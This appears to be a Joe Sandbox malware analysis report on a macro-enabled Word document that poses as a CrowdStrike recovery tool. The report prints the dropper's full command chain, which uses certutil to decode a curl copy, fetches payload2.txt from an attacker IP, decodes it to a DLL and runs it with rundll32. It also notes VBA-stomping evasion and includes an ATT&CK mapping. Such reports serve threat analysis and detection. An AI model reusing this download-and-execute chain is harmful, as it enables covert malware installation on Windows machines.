w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>On an impacted virtual machine, add a DVD Drive under
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: Hyper-V Settings
Source: document.xml	Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="5A9C771D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Using recovery media on Hyper-V virtual machines</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t xml:space="preserve"> The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.</w:t></w:r></w:p><w:p w14:paraId="3F927671" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xml	Binary or memory string: s Hyper-V settings.</w:t></w:r></w:p><w:p w14:paraId="4A7B9EB4" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="14"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>Reboot normally.</w:t></w:r></w:p><w:p w14:paraId="0384424D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:lastRenderedPageBreak/><w:t>

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F4A1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4DAFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F35AFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, VBA stomping: true
Source: ~WRC0001.tmp.16.dr	OLE indicator, VBA stomping: true

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c xcopy c:\windows\system32\curl.exe c:\users\user\appdata\local\temp & certutil -f -encode c:\users\user\appdata\local\temp\curl.exe c:\users\user\appdata\local\temp\curl.txt & certutil -f -decode c:\users\user\appdata\local\temp\curl.txt c:\users\user\appdata\local\temp\curl.exe & c:\users\user\appdata\local\temp\curl.exe http://172.104.160.126:8099/payload2.txt -o c:\users\user\appdata\local\temp\mscorsvc.txt & certutil -f -decode c:\users\user\appdata\local\temp\mscorsvc.txt c:\users\user\appdata\local\temp\mscorsvc.dll & del c:\users\user\appdata\local\temp\curl.exe & del c:\users\user\appdata\local\temp\curl.txt & del c:\users\user\appdata\local\temp\curl.exe & del c:\users\user\appdata\local\temp\mscorsvc.txt & start " " rundll32 c:\users\user\appdata\local\temp\mscorsvc.dll,dllmain & exit

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F4DBAFC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Source: C:\Windows\System32\certutil.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4A2B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4CF964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F322B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F34F964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	32 Scripting	Valid Accounts	13 Command and Scripting Interpreter	32 Scripting	11 Process Injection	13 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Obfuscated Files or Information	1 DLL Side-Loading	11 Process Injection	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Rundll32	LSA Secrets	14 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	26%	ReversingLabs	Script-Macro.Downloader.Heuristic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0001.tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\curl.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://aka.ms/WRH	0%	Avira URL Cloud	safe
https://curl.se/libcurl/c/curl_easy_setopt.html	0%	Avira URL Cloud	safe
https://curl.se/docs/copyright.htmlD	0%	Avira URL Cloud	safe
https://curl.se/docs/hsts.html	0%	Avira URL Cloud	safe
https://curl.se/	0%	Avira URL Cloud	safe
http://172.104.160.126:80X99	0%	Avira URL Cloud	safe
https://curl.se/docs/http-cookies.html	0%	Avira URL Cloud	safe
https://www.crowdstrike.com/blog/statement-on-falcon-content-update-for-windows-hosts/	0%	Avira URL Cloud	safe
http://172.104.160.126:8099	0%	Avira URL Cloud	safe
https://aka.ms/vs/17/release/vc_redist.x64.exe	0%	Avira URL Cloud	safe
http://172.104.160.	0%	Avira URL Cloud	safe
https://curl.se/docs/copyright.html	0%	Avira URL Cloud	safe
https://curl.se/P	0%	Avira URL Cloud	safe
https://curl.se/docs/sslcerts.html	0%	Avira URL Cloud	safe
https://curl.se/docs/hsts.html#	0%	Avira URL Cloud	safe
https://azure.status.microsoft/status	0%	Avira URL Cloud	safe
https://curl.se/docs/http-cookies.html#	0%	Avira URL Cloud	safe
https://sb-ssl.google.com/safebrowsing/clientreport/download?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	0%	Avira URL Cloud	safe
https://www.intel.com/content/www/us/en/support/articles/000054990/intel-nuc/intel-nuc-kits.html	0%	Avira URL Cloud	safe
http://172.104.160.126:8099/payload2.txt	0%	Avira URL Cloud	safe
https://curl.se/docs/sslcerts.htmlcurl	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sb-ssl.l.google.com	172.217.168.14	true	false	unknown
www.google.com	142.250.203.100	true	false	unknown
sb-ssl.google.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://sb-ssl.google.com/safebrowsing/clientreport/download?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://curl.se/docs/hsts.html	curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	false	Avira URL Cloud: safe	unknown
https://aka.ms/vs/17/release/vc_redist.x64.exe	document.xml	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/copyright.htmlD	xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	false	Avira URL Cloud: safe	unknown
https://curl.se/	curl.exe	false	Avira URL Cloud: safe	unknown
https://aka.ms/WRH	~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	false	Avira URL Cloud: safe	unknown
https://curl.se/libcurl/c/curl_easy_setopt.html	curl.exe.4.dr	false	Avira URL Cloud: safe	unknown
https://www.crowdstrike.com/blog/statement-on-falcon-content-update-for-windows-hosts/	~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	false	Avira URL Cloud: safe	unknown
http://172.104.160.126:8099	vbaProject.bin	true	Avira URL Cloud: safe	unknown
https://curl.se/docs/http-cookies.html	curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	false	Avira URL Cloud: safe	unknown
http://172.104.160.126:80X99	vbaProject.bin	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/copyright.html	curl.exe	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/hsts.html#	curl.exe	false	Avira URL Cloud: safe	unknown
https://azure.status.microsoft/status	~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	false	Avira URL Cloud: safe	unknown
https://www.intel.com/content/www/us/en/support/articles/000054990/intel-nuc/intel-nuc-kits.html	~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	false	Avira URL Cloud: safe	unknown
http://172.104.160.	~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	true	Avira URL Cloud: safe	unknown
https://curl.se/P	xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/http-cookies.html#	curl.exe	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/sslcerts.html	curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	false	Avira URL Cloud: safe	unknown
http://172.104.160.126:8099/payload2.txt	curl.exe, 00000016.00000002.523173521.0000000000070000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://curl.se/docs/sslcerts.htmlcurl	curl.exe	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.168.14	sb-ssl.l.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.203.100	www.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1478411
Start date and time:	2024-07-22 15:50:15 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 56s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Detection:	MAL
Classification:	mal88.expl.evad.winDOCM@51/26@4/3
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .docm Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Browse link: https://go.microsoft.com/fwlink/?linkid=2280386 Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.217.168.3, 173.194.79.84, 172.217.168.46, 34.104.35.123, 184.28.89.167, 184.30.24.206, 142.250.203.99
Excluded domains from analysis (whitelisted): accounts.google.com, clientservices.googleapis.com, e11290.dspg.akamaiedge.net, clients2.google.com, go.microsoft.com, dlc-shim.trafficmanager.net, e12671.dscd.akamaiedge.net, edgedl.me.gvt1.com, download.microsoft.com.edgekey.net, main.dl.ms.akadns.net, go.microsoft.com.edgekey.net, update.googleapis.com, download.microsoft.com, clients.l.google.com
Execution Graph export aborted for target curl.exe, PID 2432 because there are no executed function
Execution Graph export aborted for target curl.exe, PID 3136 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 841x744, components 3
Category:	dropped
Size (bytes):	74268
Entropy (8bit):	7.9444839660162145
Encrypted:	false
SSDEEP:	1536:KJJ9JA6k9NJBwEQVuIeFVfm5iQmeDDRx/XBdRbX1o/:KJJ/uBw0FV+5iQmeBx/xdRbX1o/
MD5:	45C59288E77195B7C14579CD59717986
SHA1:	AEF3C27DB85493C0E85CAD04E301C092640E7684
SHA-256:	C4AFC369DC15759D81E8563052CFDA5D04EF6B7F76177EB01AA4C2695CB1486F
SHA-512:	7B1F375175780FC5864FA67C1CE64A885B471678EF2D966B00107AE3FBC1649EDE1388BC5F382A002105FC2F624DA230C64D21F005DA79D4EE9B7C20B5764BDE
Malicious:	false
Preview:	......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................I.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.\|......................................................

Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	530944
Entropy (8bit):	6.426002179912066
Encrypted:	false
SSDEEP:	12288:fY/9QPTCgxPjg26sSS4x0WZ40lNYgBOJDN3NlhBATWStJ:geLCY0mSSxWG0lN1O7rA6StJ
MD5:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
SHA1:	C9ECDE4DE3C60F99C69BBCA4332F4162E0BF252F
SHA-256:	D76D08C04DFA434DE033CA220456B5B87E6B3F0108667BD61304142C54ADDBE4
SHA-512:	1B04B40D36B6CDCB805C720341A21885594B9C7BAEAD0A6CC56E7F6CC1ACDFDB2522C12276B0973EAF2911A6D2A105DEFC27D48E574A6F87A11BFACCACF65E3F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.{MPq(MPq(MPq(+?.(FPq(.%t)kPq(.%u)BPq(.%r)GPq(D(.(.Pq(>2p)DPq(MPp(.Pq(.%y).Pq(.%.(LPq(.%s)LPq(RichMPq(........PE..d...J.~b.........."..........\.................@.............................`......[.....`.................................................H...4....@..@........(...........P..........T..............................8............................................text............................... ..`.rdata..............................@..@.data...`...........................@....pdata...(.......*..................@..@_RDATA.......0......................@..@.rsrc...@....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................

Process:	C:\Windows\System32\certutil.exe
File Type:	PEM certificate
Category:	dropped
Size (bytes):	730108
Entropy (8bit):	5.445175115010181
Encrypted:	false
SSDEEP:	12288:sbWG2aZxq0mOWBsfuZ6/D7ilVVMvk43mw:siG2RvOWB8ui7kVVEB
MD5:	6CD8C188A2B0A5A11B2F02648B675874
SHA1:	11F8F207DA2F2B64E8A978B37BC091DA25B380C4
SHA-256:	B27A847F5059294E8E6F9C8B939C0437173C73E0194CF03CDCE4092A025B0C8F
SHA-512:	8C83E985C44F63E382CCFE64662D3E54137A4ADE7C0EE9BC409095F0631D471BFEF7A00FB8E6073CAFDD9ACAA8E241BACEC934AE1430728749002882D2BE366B
Malicious:	true
Preview:	-----BEGIN CERTIFICATE-----..TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v..dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAAJMR97TVBxKE1QcShNUHEo..Kz+MKEZQcSgfJXQpa1BxKB8ldSlCUHEoHyVyKUdQcShEKOIoAVBxKD4ycClEUHEo..TVBwKKVQcSiMJXkp3FBxKIwljihMUHEojCVzKUxQcShSaWNoTVBxKAAAAAAAAAAA..UEUAAGSGBwBKtn5iAAAAAAAAAADwACIACwIOHQDIBQAAXAIAAAAAABC3BQAAEAAA..AAAAQAEAAAAAEAAAAAIAAAYAAAAAAAAABgAAAAAAAAAAYAgAAAQAAFsXCQADAGDB..AAAQAAAAAAAAEAAAAAAAAAAAEAAAAAAAABAAAAAAAAAAAAAAEAAAAAAAAAAAAAAA..SMoHADQDAAAAQAgAQAcAAAAACACYKAAAAAAAAAAAAAAAUAgA8A8AAICjBwBUAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4KMHADgBAAAAAAAAAAAAAADgBQAQCAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAAAxwUAABAAAADIBQAABAAA..AAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAAjAcCAADgBQAACAIAAMwFAAAAAAAAAAAA..AAAAAEAAAEAuZGF0YQAAAGAPAAAA8AcAAAIAAADUBwAAAAAAAAAAAAAAAABAAADA..LnBkYXRhAACYKAAAAAAIAAAqAAAA1gcAAAAAAAAAAAAAAAAAQAAAQF9SREFUQQAA../AAAAAAwCAAAAgAAAAAIAAAAAAAAAAAAAAAAAEAAAEAucnN

Process:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	25518
Entropy (8bit):	7.981260120775725
Encrypted:	false
SSDEEP:	768:OxBz7hEdHHosjJeGrv2gsHrSe1fLKnHfzz:OxBz7YosjMGOgsJ1jyn
MD5:	9C4B364491E6AF11CC33DF28C33C4216
SHA1:	4A0F078995949E9FC29BCE9437EB902BB32D462B
SHA-256:	30C65E1E9879FE37A4A18DC8B4887C4DFE3BA29E89885D9FE61365869E93CFFD
SHA-512:	AD395F489DF5C4388221734755AB7D7FDA6DB902F3E56A35B29FFC15D3D778298BD6CD24FAF3AB9CC53BDB1099617A72C95F3759DB4393875E14E3EC9A324279
Malicious:	false
Preview:	PK........4P.X....(..Xi......ADKLicenseAgreement.rtf.}ko.H..~6.....@W.Tj.l.].X.mU..].G....}.......a........\|.R.=.;..........q".t.X..2.....~....V..lz+.l.....p.w....?V.......V..vV.........x.v..W../^.2.{..tqPz.....g6....4..4`....s.....X....`.{...[m}...j.D.W.jpv.......04..g..?...0..r..wV...=.../Ah.......!...~..........vk...e....OS......{..............T..Vl..^..pU.._.U.G..UO..6$.p..8......8Tn..v..._..z...P.:.w.Ug6.......L..=q..S-.#.ULe./M/rC.).V.=..{P}....a...G.w.U.}..~.]....m>rk.c.^.............4..}(.V{.@% ......4.5...A..}.]...w....\|...fv5.]L.r:..@..'_f..w_.l.XL..O..%..^......W...l..L.......H.j.`..B.z.c........}o.c...]...k.....m..d.'6..[......'q..`....v..{..\|q..<..........._..F\|t.zF...=!..r4......O../..q.\.c.....R~._....'...<cp..M._.._..#kDZ........~y...../..a0.....^.<8....&.pv...F....b\|.i....\.GM...]..........b.0G....f.&...E.V.a.0...h.........W...2JPI.w~.7...I}.....W.A.G..f.E.s02E.U......:..{.a.\......).eQ..^K...R..E....... ..C.@r....UO

File type:	Microsoft Word 2007+
Entropy (8bit):	7.938940748289286
TrID:	Word Microsoft Office Open XML Format document with Macro (52004/1) 37.96% Word Microsoft Office Open XML Format document (49504/1) 36.13% Word Microsoft Office Open XML Format document (27504/1) 20.07% ZIP compressed archive (8000/1) 5.84%
File name:	New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
File size:	310'160 bytes
MD5:	dd2100dfa067caae416b885637adc4ef
